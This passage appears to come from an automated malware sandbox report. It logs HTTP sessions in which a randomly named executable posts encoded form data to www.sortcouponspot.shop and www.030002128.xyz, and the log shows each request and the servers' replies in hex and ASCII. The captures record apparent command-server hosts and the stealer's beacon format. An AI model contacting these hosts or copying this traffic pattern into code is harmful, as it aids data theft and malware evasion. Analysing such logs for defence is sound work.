                                                                        Dec 13, 2024 13:07:08.252502918 CET662INData Raw: 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 22 3b 62 2e 67 65 74 45 6c 65
                                                                        Data Ascii: ts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.449740172.67.158.234805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:07:09.695612907 CET10890OUTPOST /90oi/ HTTP/1.1
                                                                        Host: www.sortcouponspot.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.sortcouponspot.shop
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.sortcouponspot.shop/90oi/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 62 66 75 52 74 77 54 74 50 53 7a 46 6f 6b 58 68 49 4f 4b 6c 57 54 64 52 4c 5a 6a 43 44 49 42 56 49 78 68 4f 63 54 41 79 6a 4c 32 63 39 78 7a 33 49 55 67 58 50 51 59 51 44 61 73 75 6f 52 53 67 42 37 43 50 32 4d 42 33 78 2f 48 6e 61 55 5a 74 75 54 74 2f 63 32 6e 77 71 78 76 70 6f 4f 4c 52 30 45 4a 6e 36 48 76 4d 47 62 38 61 64 6c 33 4c 6e 35 71 6a 4c 62 78 4e 66 39 4a 79 74 43 6a 32 6f 4d 46 30 75 6f 6a 6d 58 46 49 41 63 78 32 59 70 75 6d 35 52 47 6a 6d 7a 6a 41 43 46 76 31 45 54 59 59 69 37 79 4f 39 30 72 70 54 58 55 4e 42 71 75 76 62 35 69 52 38 38 50 41 32 61 41 33 41 6f 41 56 74 52 73 47 44 5a 64 53 53 74 75 35 70 66 46 69 47 69 68 70 51 32 70 7a 6c 6b 47 6e 38 31 61 35 6d 44 43 4e 2b 6e 36 44 32 57 42 61 59 35 71 6b 63 62 2f 65 7a 5a 58 48 6c 46 56 61 41 77 65 48 33 76 49 47 30 50 63 32 32 75 78 62 42 63 32 54 6c 4b 77 55 34 35 36 39 69 58 37 79 48 2f 68 52 52 44 6c 31 72 4c 79 42 56 71 5a 65 34 33 73 42 7a 57 73 74 69 44 57 6d 6e 2f 71 35 38 7a 38 6b 35 51 55 4b 66 6d 4c 4f [TRUNCATED]
                                                                        Data Ascii: 9B_ppt=bfuRtwTtPSzFokXhIOKlWTdRLZjCDIBVIxhOcTAyjL2c9xz3IUgXPQYQDasuoRSgB7CP2MB3x/HnaUZtuTt/c2nwqxvpoOLR0EJn6HvMGb8adl3Ln5qjLbxNf9JytCj2oMF0uojmXFIAcx2Ypum5RGjmzjACFv1ETYYi7yO90rpTXUNBquvb5iR88PA2aA3AoAVtRsGDZdSStu5pfFiGihpQ2pzlkGn81a5mDCN+n6D2WBaY5qkcb/ezZXHlFVaAweH3vIG0Pc22uxbBc2TlKwU4569iX7yH/hRRDl1rLyBVqZe43sBzWstiDWmn/q58z8k5QUKfmLOnFk0FP/Zke32Le0vErylRPvjdQSU9GXytfjEYVB4q0v0cqv7SWmA4w5His8FHkhih/ZbWfcHxlkpvn0StBty8xGRwmeZrla4NcjjPgSbUKqHgjW4wUq1/3D7QJRzFP0H4d+bdJrgKR/UOUIqzkhKRyWzU9MaGJfGfTwhjDAFspzKPmO6OX/JM26dlOWH+RHf4DLC/u/v8ZcC6x0dbw2gT4J/iEKkEojiNs5LgE7jZX3XLjsN8xGmzf2wPwv3N0lts45Hh5RZQLSNLkedLAI8rKduMaTvy5jeW4WxuM6lleFPw8nMAj7SIrEZiNE0VFJLtdqKqZniC+L3e1WI+CXEh8IbZYbWo62BSkWhhKgUzGZruStkMaM36dI29zGTFT29yrR5H+MTurOzfBgvJU+ERFrNwB2/hIzk3g8x9ADW3Cuxj6cGfqLaiZFlGB2kcbCdxNO8xoUXqBoeavtHhBzD4SUwyj6i5tuNQ5dvdI38mouuO5vACo9imFOp/Z/UxoBt7vcRUwmJjrtAilX2+unkBW/5hlmw4EiHdp4szuG2O//PvXoVi8r2K93pyUEukpD0UEHvQBnx6DFplZIPnngFjYO5pqISmfoQfzxbDQvtVjH0CdZojkwHHH3TcD1OEbKUThhkNbCxIVsmZbPMrYO1xVCiJgeQMsK9y+ [TRUNCATED]
                                                                        Dec 13, 2024 13:07:10.908570051 CET1236INHTTP/1.1 429
                                                                        Date: Fri, 13 Dec 2024 12:07:10 GMT
                                                                        Content-Type: text/html;charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=23gUTE9iJz7eJsNX1IZB0bt6N4lj%2BbTq8AfpN8agQx%2F32iQTdZcd2BjFSgDvSrZEH9R4uXC1ytxKDxkaIomkbC%2F8Qon0cQtOLThC3wOaHwOI%2BAu%2B%2FMB5f69hb37YHjjojtuPLjKcusaC3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f15d5135ea80f3e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1704&rtt_var=852&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10890&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 34 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 31 35 64 35 31 33 35 65 61 38 30 66 33 65 27 2c 74 3a 27 4d 54 63 7a 4e 44 [TRUNCATED]
                                                                        Data Ascii: 44b<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8f15d5135ea80f3e',t:'MTczNDA5MTYzMC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platf
                                                                        Dec 13, 2024 13:07:10.908677101 CET671INData Raw: 6f 72 6d 2f 73 63 72 69 70 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 22
                                                                        Data Ascii: orm/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.st


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.449747172.67.158.234805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:07:12.347208023 CET518OUTGET /90oi/?9B_ppt=WdGxuHz/ABXbnxDuMcWeaiAtNv6zbYEnDSFRQwgnlI3l3VbPFG0OHzktVpkkqW+LG4OUxeltpIvdJ1ISlR18S3Wjl2Tf6Ort1F9q8CbBD/86Ywb40YjbYcY=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
                                                                        Host: www.sortcouponspot.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:07:13.579396009 CET1236INHTTP/1.1 429
                                                                        Date: Fri, 13 Dec 2024 12:07:13 GMT
                                                                        Content-Type: text/html;charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BraqSLccUd4v3Kk5mRQJiUhUECQSF47EWOF5ybAAbZwWUHyr58hJAZ%2B4hJ0%2FbEpQegU9B9wsl2HJ9slSOxq8p4fFOvVUMVxXBqI7nN0yuaEiAhWlnihGnloXwj6p7xURftJnkpTQXlz0eg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f15d5241dec8ce0-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1823&min_rtt=1823&rtt_var=911&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=518&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 34 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 31 35 64 35 32 34 31 64 65 63 38 63 65 30 27 2c 74 3a 27 4d 54 63 7a 4e 44 [TRUNCATED]
                                                                        Data Ascii: 44b<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8f15d5241dec8ce0',t:'MTczNDA5MTYzMy4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scrip
                                                                        Dec 13, 2024 13:07:13.579413891 CET662INData Raw: 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 22 3b 62 2e 67 65 74 45 6c 65
                                                                        Data Ascii: ts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.449768161.97.142.144805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:07:19.234565973 CET770OUTPOST /fc2m/ HTTP/1.1
                                                                        Host: www.030002128.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.030002128.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.030002128.xyz/fc2m/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 48 59 75 67 61 49 58 6e 66 2b 50 39 38 44 46 70 7a 57 35 4f 6c 47 75 51 4a 65 50 74 41 65 4b 4a 64 4c 72 79 34 46 38 31 47 62 69 68 62 76 36 6e 54 63 47 66 75 52 77 56 73 65 6e 32 4a 74 57 49 43 2f 6b 2b 6d 32 4f 74 75 41 66 53 62 5a 66 41 59 6d 78 46 42 73 4b 52 31 79 4f 45 4e 32 6e 53 6d 53 65 78 42 44 4c 63 52 46 62 71 69 69 79 4a 33 63 66 6f 36 56 66 47 69 44 37 67 77 50 47 34 61 48 6f 50 78 39 42 30 6f 59 79 48 4e 4f 67 75 71 2b 4e 79 5a 57 4f 6d 31 42 72 6c 43 59 58 52 47 68 4d 6e 41 44 30 4f 4d 37 59 64 74 43 4a 30 65 38 55 39 75 6d 56 73 32 52 54 4b 62 67 76 6a 5a 77 3d 3d
                                                                        Data Ascii: 9B_ppt=HYugaIXnf+P98DFpzW5OlGuQJePtAeKJdLry4F81Gbihbv6nTcGfuRwVsen2JtWIC/k+m2OtuAfSbZfAYmxFBsKR1yOEN2nSmSexBDLcRFbqiiyJ3cfo6VfGiD7gwPG4aHoPx9B0oYyHNOguq+NyZWOm1BrlCYXRGhMnAD0OM7YdtCJ0e8U9umVs2RTKbgvjZw==
                                                                        Dec 13, 2024 13:07:20.468278885 CET1236INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Fri, 13 Dec 2024 12:07:20 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"66cce1df-b96"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                        Dec 13, 2024 13:07:20.468355894 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.449774161.97.142.144805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:07:21.900254965 CET790OUTPOST /fc2m/ HTTP/1.1
                                                                        Host: www.030002128.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.030002128.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.030002128.xyz/fc2m/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 48 59 75 67 61 49 58 6e 66 2b 50 39 38 6a 31 70 77 31 68 4f 69 6d 75 54 46 2b 50 74 4c 2b 4b 4e 64 4c 6e 79 34 45 49 66 48 70 32 68 43 50 71 6e 53 59 79 66 74 52 77 56 6e 2b 6e 7a 55 64 57 58 43 2f 67 32 6d 33 79 74 75 41 4c 53 62 63 6a 41 59 78 64 47 54 4d 4b 54 36 53 4f 61 4a 32 6e 53 6d 53 65 78 42 43 75 35 52 46 54 71 6c 54 43 4a 78 39 66 72 37 56 66 46 7a 44 37 67 30 50 47 38 61 48 70 59 78 38 64 65 6f 61 4b 48 4e 4d 49 75 72 76 4e 31 58 6d 4f 67 78 42 72 32 4e 39 79 71 49 42 51 73 42 6c 67 65 4d 5a 45 67 6f 45 45 75 50 4e 31 71 38 6d 78 66 72 57 61 2b 57 6a 53 71 43 79 35 33 34 57 6a 65 6b 2b 6f 6c 48 4d 55 33 63 41 61 4b 58 74 45 3d
                                                                        Data Ascii: 9B_ppt=HYugaIXnf+P98j1pw1hOimuTF+PtL+KNdLny4EIfHp2hCPqnSYyftRwVn+nzUdWXC/g2m3ytuALSbcjAYxdGTMKT6SOaJ2nSmSexBCu5RFTqlTCJx9fr7VfFzD7g0PG8aHpYx8deoaKHNMIurvN1XmOgxBr2N9yqIBQsBlgeMZEgoEEuPN1q8mxfrWa+WjSqCy534Wjek+olHMU3cAaKXtE=
                                                                        Dec 13, 2024 13:07:23.137814999 CET1236INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Fri, 13 Dec 2024 12:07:22 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"66cce1df-b96"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                        Dec 13, 2024 13:07:23.137918949 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.449780161.97.142.144805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:07:24.659626007 CET10872OUTPOST /fc2m/ HTTP/1.1
                                                                        Host: www.030002128.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.030002128.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.030002128.xyz/fc2m/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 48 59 75 67 61 49 58 6e 66 2b 50 39 38 6a 31 70 77 31 68 4f 69 6d 75 54 46 2b 50 74 4c 2b 4b 4e 64 4c 6e 79 34 45 49 66 48 70 75 68 65 73 53 6e 64 5a 79 66 73 52 77 56 37 4f 6e 79 55 64 57 65 43 2f 59 79 6d 33 2b 39 75 43 7a 53 4a 71 33 41 4a 31 4a 47 4b 38 4b 54 2f 69 4f 48 4e 32 6e 48 6d 53 4f 31 42 44 65 35 52 46 54 71 6c 51 61 4a 32 73 66 72 35 56 66 47 69 44 36 68 77 50 47 59 61 48 77 74 78 38 59 72 72 71 71 48 4d 73 34 75 6d 39 6c 31 56 47 4f 69 39 68 71 72 4e 39 32 31 49 42 39 56 42 6c 38 30 4d 62 59 67 6b 46 68 4a 57 65 77 39 72 56 4a 39 7a 58 50 63 51 7a 47 31 50 53 64 57 38 53 53 48 32 64 30 77 4b 63 78 77 50 52 32 6f 56 59 36 70 6d 50 6a 35 56 7a 72 35 4f 6a 79 30 49 75 39 75 6c 4e 78 4c 58 47 2b 31 41 64 39 63 6f 6e 6d 37 35 35 64 53 72 35 5a 73 6d 37 33 73 74 64 75 50 2b 78 67 46 42 76 53 79 72 4a 38 36 6c 71 78 36 59 55 38 72 2f 4c 54 66 45 2f 2f 54 4a 69 64 36 47 74 66 54 6c 39 51 6f 68 42 36 61 4e 36 6c 42 53 76 52 43 78 74 59 46 30 77 36 6e 4d 53 37 53 53 4e 70 [TRUNCATED]
